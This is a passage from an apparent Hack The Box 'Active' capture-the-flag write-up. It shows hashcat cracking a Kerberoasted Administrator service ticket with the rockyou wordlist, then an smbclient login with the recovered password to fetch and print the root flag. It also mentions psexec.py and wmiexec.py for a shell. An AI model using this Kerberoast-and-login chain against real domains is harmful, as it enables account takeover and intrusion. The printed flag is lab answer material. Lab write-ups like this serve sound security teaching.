Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$2baa10b89e539debb3826e895558bb411716440163c0c58732cf720323c9a9aa826a642157ad0d2ba376c95c56afefc1d4bee7a9533630a6dcc04fd9ba8af95c4d25ebe2077c0326a388e77ec446b5cee6791dc59391bb593c123a7d8ad7900666ff52a8abb54bb669975036dbb81b3332dd97030abf678aa05615d2d8a5451438bd5e7a42dbf216af9a9f76e13555b7fe50499506ba21810da519597d02d93f97c3c0a9e46232cd6a42773164e0379856e7a6a79b99e03dc04d8068773671debcf475d1f2e697b7f712a05c80eec8db9c08415334891be5de3fc956d3eec167f2e40b0dd3c1455b963edbd257da9c3294bcdbe5c8e2a5f66fc502c4f4f6eff26789fb44ac74be1a19964e631db761c77ec358125ca2c361956fa2507babb386f287c8f40c6ffad883191f9a5927565251a3fe6b2b284865474622ca1af1165ed868941f0a2a10d2d3be6d00594a7b0de296b56cefa7498e8650b51ef5808ff403901ecf3cf05a32469e0f60f77d2e8a0624a66f3a44739fb156fc56e3067c55cc46656fea04484022190de22832dbb7c0e3df5921be6c401c21a56e39cc96b9a57ff699e69aa96ce0d3031f75b596b349f11b46bbe2270fc3434a294bd4c085ff2713704d1131152603055e683de455f2e15a52ddacede834c80cf172409f68658a8f5db4e46a349b135718218e5cf36aecf830d0515fa580740bd9dbb1fa7488cdc7c57c1f1e0cabc208d581703b812ad69d1e58d4850b1f5015679b63fdfee9dc66720fe83c2662dcf719bd7205aadbebc891b631a13d03561982092636d6cbc56c2ffbcf4bebed14ceeb74898d828dacb93b6fcf07db4d0d972a39f3891ccb09a95a530fbd50f583f0eba35a349a884e65c3d112886e9712f8b9b1af0b359ae30ae2b952e1449d990ea5c34af41dc73ca4b4b9986daa98c1c87ff987fc61a0fa25e16a4799a54c0c5995daf2fba027844d18eb9d6d4cf0986b66e5ee4a536b1385341e63e582c7f7320104a164ee4c63d7c96c22aba031f6c6f90631f2e4a7aaa9e56d52f51352f608c1d538a2f76fddcfd27229b9467d4a36c3c6a252b05f1a7fc691d5722223b8d8d6d44886ed4e93afcd8f98b81ad2d6464c15d0e58315f14c2e46a8335b41dd7fbb5294d57a64881da8c5c667f815f876717498a16e8a2092525a56239e7ae2c60414fedc572d4fe793eadbc06ec516bc60c775c5b65e6e0764b84160d20b55268d3a1e0c59027e96c883c0ecb3aebe:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b3aebe
Time.Started.....: Mon Aug 28 08:18:20 2023 (23 secs)
Time.Estimated...: Mon Aug 28 08:18:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 456.6 kH/s (2.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 73%
Started: Mon Aug 28 08:17:46 2023
Stopped: Mon Aug 28 08:18:45 2023
The Administrator password is Ticketmaster1968, recovered in 23 seconds on a laptop CPU. A long random password, or a group managed service account for whatever needed the SPN, would have made this ticket uncrackable.
Connect with smbclient as Administrator. The Users share is enough to read root.txt; an interactive shell is not needed, though psexec.py or wmiexec.py would give one with the same credentials:
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278043 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Mon Jul 16 06:14:21 2018
.. D 0 Mon Jul 16 06:14:21 2018
AppData DHn 0 Mon Jul 16 06:14:15 2018
Application Data DHSrn 0 Mon Jul 16 06:14:15 2018
Contacts DR 0 Mon Jul 30 09:50:10 2018
Cookies DHSrn 0 Mon Jul 16 06:14:15 2018
Desktop DR 0 Thu Jan 21 11:49:47 2021
Documents DR 0 Mon Jul 30 09:50:10 2018
Downloads DR 0 Thu Jan 21 11:52:32 2021
Favorites DR 0 Mon Jul 30 09:50:10 2018
Links DR 0 Mon Jul 30 09:50:10 2018
Local Settings DHSrn 0 Mon Jul 16 06:14:15 2018
Music DR 0 Mon Jul 30 09:50:10 2018
My Documents DHSrn 0 Mon Jul 16 06:14:15 2018
NetHood DHSrn 0 Mon Jul 16 06:14:15 2018
NTUSER.DAT AHSn 524288 Sun Aug 27 22:45:57 2023
ntuser.dat.LOG1 AHS 262144 Sun Aug 27 23:33:08 2023
ntuser.dat.LOG2 AHS 0 Mon Jul 16 06:14:09 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
ntuser.ini HS 20 Mon Jul 16 06:14:15 2018
Pictures DR 0 Mon Jul 30 09:50:10 2018
PrintHood DHSrn 0 Mon Jul 16 06:14:15 2018
Recent DHSrn 0 Mon Jul 16 06:14:15 2018
Saved Games DR 0 Mon Jul 30 09:50:10 2018
Searches DR 0 Mon Jul 30 09:50:10 2018
SendTo DHSrn 0 Mon Jul 16 06:14:15 2018
Start Menu DHSrn 0 Mon Jul 16 06:14:15 2018
Templates DHSrn 0 Mon Jul 16 06:14:15 2018
Videos DR 0 Mon Jul 30 09:50:10 2018
5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt AR 34 Sun Aug 27 22:45:51 2023
5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active active.gnmap active.htb active.nmap active.xml decode.py kerbrute root.txt users.txt user.txt
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat root.txt
b74a82c6fd9308eadeb3be8c43a6e766
┌──(kali㉿kali)-[~/HTB/Active]
Root flag b74a82c6fd9308eadeb3be8c43a6e766